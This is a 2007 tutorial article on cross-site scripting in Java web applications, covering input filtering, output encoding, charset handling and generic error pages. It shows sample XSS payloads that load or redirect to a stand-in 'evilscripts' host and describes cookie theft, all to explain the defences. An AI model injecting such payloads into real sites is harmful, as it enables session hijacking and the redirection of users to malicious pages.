Cross Site Scripting Java Input Validation
16.09.2007
This is the second article in a series on handling Java web application input. In part one, I talked about validation best practices and SQL injection attacks. In this article, I will continue the theme, and in particular will talk about the threat of cross-site scripting, as well as looking at correctly handling exceptions in J2EE web applications.
Cross-Site Scripting
Cross-site scripting, also known as XSS, is an attack against dynamic applications. It occurs when an application ignorantly accepts input containing units of instruction from an external source. This input is then sent as part of the response to a delivery medium such as a web browser, and may also be persisted to a data store for future display. The success of such an attack is heavily dependent on a web browser's facility to discern regular content from instruction: markup and data. Let us consider a simple example, shown in Figure 1, that allows the posting of movie reviews.

Figure 1 shows a web page that allows a user to post a movie review. Let us consider what would happen if a movie review was posted containing some JavaScript code:
<script> alert("Hello Script Injection"); </script>
The possible result of this is shown in Figure 2.

Figure 2. Script injection attack
As you can see, this input results in the
JavaScript scriptlet being executed anytime
a user requests the web page. In this case,
it displays a harmless alert window. An
attacker initiates this attack by
interacting with the application, passing
data through HTML form input fields. This
data is then sent to the web server via a
HTTP post request. On receipt, the web
server passes this request to the J2EE web
container, which in turn parses the HTTP
request to extract pertinent data: HTTP
headers, request data, referrer URL, etc.
This data is then used to construct a
javax.servlet.http.HttpServletRequest
that provides a programmer-friendly
interface to this data. This object is then
used to retrieve the movie data, performing
simple validation to ensure required data
has been set.
The problem with this approach is that
the validation employed does not protect
against an XSS attack. This is due to the
fact that input data contains characters
that are considered special under the HTML
specification. The HTML 4.0 specification
includes around 250 special characters.
However, in relation to a XSS attack,
commonly used characters include <,
>, &, {,
}, [, ],
and %. An attacker can use
these characters and others to construct a
series of attack strings that the receiving
web browser will interpret as units of
instruction and execute accordingly.
Now consider the following tag:
<script type="text/javascript" src="http://evilscripts/js/evilScript.js" />
This results in the malicious script evilScript.js being downloaded and executed. A similar attack looks like this:
<script type="text/javascript">
location.href="http://evilscripts/js/evilScriptPage.html";
</script>
The result of this would be the user being redirected to evilScriptPage.html on every load of the page.
An anchor can hide a script, too:
<A HREF="http://evilscripts.com/evilScriptPage.html?script=
<SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
Go to Movies web site</A>
This is a link that sends a user to http://evilscripts.com/evilScriptPage.html and executes the evilScript.js script.
There are also "inline" script attacks, which work in newer browsers.
<body onload="javascript:alert('Hello Inline Script Attack');">
Finally, there are attacks that launch when the user mouses over them:
<img
onmouseover="location.href='http://evilscripts/js/evilScriptPage.html';"
src="images/example.gif" id="example"
width="482" height="297" alt="example" />
This is an image that redirects a user to http://evilscripts/js/evilScriptPage.html when the mouse is placed over the image.
Tags that Allow for Cross-Site Scripting
Common exploits include the use of
<script>, <applet>,
<object>, <embed>,
and standard HTML tags.
| Tag | Description |
|---|---|
<APPLET> |
Used to embed a Java applet in a
document. This tag is deprecated in
HTML 4.0 in favor of the
object tag.Attributes:
|
<EMBED> |
Adds an object to a document.
Commonly used to add multimedia (an
applet, ActiveX control, or Flash or
sound files) to your HTML page. Attributes:
|
<OBJECT> |
Defines an embedded object. Use
this element to add multimedia (an
applet, ActiveX control, etc.) to
your HTML page. This element allows
you to specify the data and
parameters for objects inserted into
HTML documents, and the code that
can be used to display/manipulate
that data. Attributes:
|
<SCRIPT> |
Defines an executable script,
such as JavaScript or VBScript. Code within this element is executed immediately when a page is loaded, if it is not in a function or due to the execution of an event. Attributes:
<script type="text/javascript">document.write("Hello
JavaScript!") </script>Output: Writes "Hello JavaScript!" to the web page. |
A script injection attack does not necessarily have to be initiated with malicious intent. For example, a well-meaning user could enter standard HTML markup and alter page formatting, seriously defacing the look of a website.
Threats Of Cross-Site Scripting
The exploits achieved through script injection vary across a large spectrum. This is due to the nature of the attack: any website that provides a facility for an attacker to insert instructions into a web page opens an application up to a variety of attacks, causing serious ramifications. An exploit is heavily dependent on the environment in which the malicious code executes, such as the privileges granted under the account that the application runs and the program language used. Some common exploits achieved through cross-site scripting include:
- The attacker can steal cookies, inserting a script into a web page of a vulnerable website. This script collects user cookies and then sends them to the attacker. The attacker can then impersonate a user (which is particularly dangerous in a single-sign-in environment), possibly gaining access to sensitive data such as credit card numbers and passwords.
- The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a well-meaning link; when a user clicks on the link, a malicious script is executed. A link could also be used to redirect a user to a malicious web page that takes on the appearance of a trusted site, possibly requesting security credentials.
- User input may be intercepted. An attacker could write a script that monitors user input and sends sensitive data back to the attacker.
- An attacker can trick the web server into executing malicious code in the same context as trusted code. This can give the attacker access to the web server and possibly, network access.
- An attacker can deface a website, rendering it unreadable or adding any content they see fit.
- An attacker can use the application logger to inject malicious input into the application. This input can be executed if logs are viewed in HTML form. Therefore, a good security practice is to wrap the application logger using a custom implementation that filters malicious input.
Preventing Cross-Site Scripting
One approach to achieving prevention is to configure the web browser to disable scripting. Unfortunately, this is not always a viable option as it affects functionality and, worse, relies on autonomous configuration. Therefore we need to plug in some validation code. However, before banging out any code, it is important to understand that an attacker will take measures to evade any validation code, testing for the possibility of dangerous special characters. This will normally be carried out by using numeric character references such as hexadecimal and decimal, or character entity references of special characters for a particular character encoding, like the following:
| Char | < | > | " | : | { | } | [ | ] | ; |
| Hex Char Code | %3c | %3e | %22 | %3a | %7b | %7d | %5b | %5d | %3b |
In order to be able detect special
characters, it is vital that the web server
explicitly set the character set of any web
page. If the character set is not explicitly
set in the HTML output, an attacker can set
a different character set. An attacker can
then pass malicious content containing
special characters in a different encoding,
which the validation code cannot recognize,
rendering it obsolete. The character set of
a web page can be set by specifying the
meta tag in the head
section of an HTML page:
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
</HEAD>
The above declaration sets the character set to the Latin character set necessary for typing Western European languages. It is therefore important, when writing validation code, to be aware of what character set is being used in order to correctly recognize special characters.
Once this is set, the next step is to craft some validation code. When writing this code, it is critical to understand that every application is different (different internationalization requirements, etc.) and secure coding practices that protect one application may not protect another. Therefore, before writing any code, it is important to play the role of the attacker, looking for any entry points from which data is input from an unknown source. One these points have being identified, it is important to construct attack strings in order to understand how your application can be exploited. When it comes to writing some validation code there are two main choices: filtering and encoding.
Filtering
The safest and perhaps most performant method of preventing against attack is to only accept data that is deemed valid and reject everything else, possibly returning an error to the client. For example, if the input data is expected to be numeric, then ensure that this is the case by rejecting any input that is not.
final String inputStr = request.getParameter("input");
final String numericPattern = "^\\d+$";
if (!inputStr.matches(numericPattern))
{
/* invalid input, do something with error*/
}
Although this is the best form of prevention and would work well for the movie review example, it may not be practical to reject all data. In this case, a cleaning routine can be used, which checks for the existence of special characters and replaces each with another character, such as a space.
/* regular expression that
* tests for the existence of malicious characters
* and replaces them with a space. */
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");
Encoding
In certain situations, it is not viable to reject certain input. For example, consider an online forum that allows programmers to post code. If code is filtered, it will not display correctly, making messages difficult to understand. In this case, we cannot apply filtering and need an alternative approach.
One such approach is to encode the data.
Encoding transforms harmful characters into
their display equivalents by using character
entity references or numeric character
references. For example, < and > will be
transformed into < and > respectively.
However, when applying this approach, it is
important to set the character set of the
response, as shown earlier. This is needed
due to the way in which the web server and
the web browser interact when sending data
over the wire. When a web server needs to
send characters to a browser, it needs to
convert them into a series of bytes. When
the browser receives these bytes, it needs
to convert them back into a stream of
characters. The Charset header
specifies how this conversion is done.
Likewise, when you write dynamic content
using a JSP or in a servlet using
response.getWriter(), the web
container converts strings into bytes using
the specified character set. When encoding
is used, the character references generated
by the encoding routine are sent over the
wire as special byte sequences regulated by
the particular character set. If the
character set is not set, when the web
browser receives the stream of bytes, it may
use a different character set to transform
the data into a character stream. This makes
it possible that during the transformation
process, encoded characters may be
transformed into special characters. The
different character sets use different byte
sequences to represent characters, and this
destroys your encoding efforts.
This code is a simple routine that encodes any input passed to it for display in a web browser into its equivalent form, using decimal character references:
public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
For example, passing:
<script> alert("Hello Script Injection"); </script>
Is transformed into:
<script
> alert
("Hello
 Script
 Inject
ion"); 
</scrip
t>
This enables the browser to treat it as a
harmless string and not as executable
content. The
JSP Standard Tag Library (JSTL) provides
similar functionality, by providing the
standard out tag, which encodes
various HTML special characters using
character entity references. An important
consideration when using encoding is that it
can incur a performance penalty. Furthermore,
as stated earlier, an attacker may enter a
different representation of special
characters when sending the data to the
server (such as using a hexadecimal
representation). As a result, data should be
decoded before encoding it.
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}
byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}
String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
The above code is used to decode any hexadecimal-encoded characters. It accepts a string containing the data to decode, along with the character set to decode the data to (such as UTF-8, 8859_1, etc).
An important decision is where to apply the validation techniques. The two main places where this is commonly done are on receipt of the request or when writing the response. It is generally a good idea to apply both, and the decision to do so will depend on the specific requirements of the application. Any input data should be validated on receipt, ensuring that it is of the required type whenever possible. Encoding should be performed when writing the response. A good practice for doing this in a JSP page is to use a custom tag. This is due to the fact that data does not necessarily have to be input via the web application. Data can be input into an application via a number of different methods: through logging, entered directly into a database, etc.
Error Reporting
During the process of conducting an attack, an attacker will usually pass some input that will result in a web server returning an error. A poorly designed error-handling infrastructure will allow an attacker to learn more about the system they are trying to exploit. An attacker can use this newfound knowledge to trigger a stronger attack the next time around. Therefore, it is critical to limit the information returned.
A best practice for handling this kind of
situation is to return a generic error
message to the client and log the error,
including any resultant exceptions and the
corresponding stack traces, to the
application log file, possibly emailing a
system administrator if persistent error
conditions occur. A J2EE-compliant web
container provides a nice fit for this
scenario, using declarative error handling
through the error-page element
of the application deployment descriptor
web.xml. The error-page
element allows you to map HTTP response
codes (such as 500 Internal Server Error and
404 Not Found), as well as thrown
exceptions, to a specific error-handling
page:
<!-- Maps the 404 Not Found response code
to the error page /errPage404 -->
<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>
<!-- Maps any thrown ServletExceptions
to the error page /errPageServ -->
<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>
<!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric -->
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
The <location> element is
used to specify the resource (servlet, JSP,
etc.) that will handle an error when thrown,
the <error-code> element
specifies the error code to be handled, and
the <exception-type> element
specifies the exception to be handled. For
instance, in the above example, any error
that is sent with the error code 404 will be
intercepted by the web container and
forwarded to the resource located at
/errPage404. Likewise, any exception
that is thrown that is not an instance of
javax.servlet.ServletException
will be also forwarded. The exception and
error code can be retrieved by a servlet
handling the error using:
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute(
"javax.servlet.error.status_code")).toString( );
The error details can then be logged to a log file, and a generic error message can be returned to the client that contains no specific error details or stack traces that would aid an attacker.
Conclusion
In this series, we looked at the importance of handling application input correctly. In particular, we looked at validation best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a good starting point for J2EE developers, helping to understand and appreciate the seriousness of the very real and dangerous threat posed by inadequate data validation. The appearance of automated tools and the incorporation of new features into the various specifications and web browsers has resulted in attackers finding new and innovative ways to exploit an application through application input. An attacker can initiate an attack through a web browser by constructing attack strings, sending them via a HTTP get request through URL tampering, via a HTTP post request through HTML forms, or by other means. It is therefore critical that any possibility for data being input into an application from an external source is carefully analyzed, and secure coding practices put in place to meet the specific validation needs of an application in order to neutralize any threats.
Resources
- Open Web Application Security Project: Top ten security vulnerabilities
- Character Encoding: Explanation of character encoding
- URL Encoded Attacks: Attacks using the common web browser
- Writing Secure Code: A good resource on secure coding techniques
Related information
